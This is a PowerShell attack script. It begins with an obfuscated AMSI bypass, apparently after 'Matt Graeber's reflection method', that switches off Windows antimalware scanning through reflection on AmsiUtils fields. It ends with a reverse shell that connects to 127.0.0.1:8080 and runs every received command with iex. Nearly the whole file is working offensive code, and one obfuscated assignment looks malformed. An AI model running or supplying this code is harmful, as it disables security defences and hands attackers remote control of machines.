#Matt Graebers Reflection method 
$uvKS=$null;$lhshsgdb="$([char]([ByTE]0x53)+[CHAr]([bYTE]0x79)+[cHAr](115*78/78)+[CHar](116+33-33)+[CHAr](101+40-40)+[cHar](28+81)).$([ChaR](77+55-55)+[chAr]([BYTe]0x61)+[CHAr]([Byte]0x6e)+[CHAr]([ByTE]0x61)+[CHar]([ByTe]0x67)+[chaR]([bYTe]0x65)+[chAR]([bYTE]0x6d)+[CHAr](101+61-61)+[chAr](43+67)+[cHaR](116*31/31)).$(('Áut'+'ômã'+'tìõ'+'n').nORmAlIzE([CHaR]([ByTe]0x46)+[cHAR](37+74)+[CHar](114+49-49)+[CHAr]([BYtE]0x6d)+[cHAr](68)) -replace [ChAr](92*14/14)+[ChaR]([ByTE]0x70)+[chAr](38+85)+[chAR](41+36)+[cHAR](110)+[ChAr]([byte]0x7d)).$(('Ám'+'sì'+'Ut'+'ìl'+'s').NoRmALIZe([cHaR](70)+[CHar]([BYtE]0x6f)+[CHaR](114*105/105)+[chAR]([BytE]0x6d)+[chaR](68*38/38)) -replace [cHAR]([BYte]0x5c)+[cHAR](112+21-21)+[ChAr]([byTe]0x7b)+[cHar]([Byte]0x4d)+[CHAr]([ByTe]0x6e)+[CHAr](102+23))";$="+[chAr]([bYTe]0x6b)+[chaR](112)+[cHaR](113*30/30)+[cHaR]([BYTe]0x64)+[ChaR]([BYTe]0x74)+[CHar](120*32/32)+[cHAr]([byte]0x70)+[CHar](110+5-5)+[chAr]([Byte]0x70)+[CHAr]([bYte]0x68)+[cHaR](108*104/104)+[CHaR](101)+[chAr](122+82-82)+[chaR](98)+[ChAr](117*110/110)+[CHAr](108)+[CHar](105+8)+[chaR](111*86/86)+[ChAr]([byTe]0x71)+[chAr](101*92/92)+[cHar]([BytE]0x6c)+[cHaR]([BYte]0x65)+[Char](56+42)+[cHAR](107+95-95)+[CHAr](117+33-33)+[cHaR]([bYte]0x74)+[cHAR]([ByTe]0x72)+[char]([bYtE]0x79)";[Threading.Thread]::Sleep(1215);[Ref].Assembly.GetType($lhshsgdb).GetField($([ChaR](10+87)+[ChAR](109)+[char]([BYtE]0x73)+[chAR](105+96-96)+[chAR]([ByTE]0x49)+[CHAr](110)+[char]([ByTe]0x69)+[ChAr]([bYte]0x74)+[cHAR](70)+[Char](11+86)+[chaR]([BYTe]0x69)+[chaR](108*29/29)+[ChAR](101*13/13)+[ChAR](100*23/23)),"NonPublic,Static").SetValue($uvKS,$true);




$mem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(9076)

[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiSession","NonPublic,Static").SetValue($null, $null);[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiContext","NonPublic,Static").SetValue($null, [IntPtr]$mem)

$client = New-Object System.Net.Sockets.TCPClient("127.0.0.1",8080)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
  $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
  $sendback = (iex $data 2>&1 | Out-String )
  $sendback2 = $sendback + "PS " + (pwd).Path + "> "
  $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
  $stream.Write($sendbyte,0,$sendbyte.Length)
  $stream.Flush()
}
$client.Close()
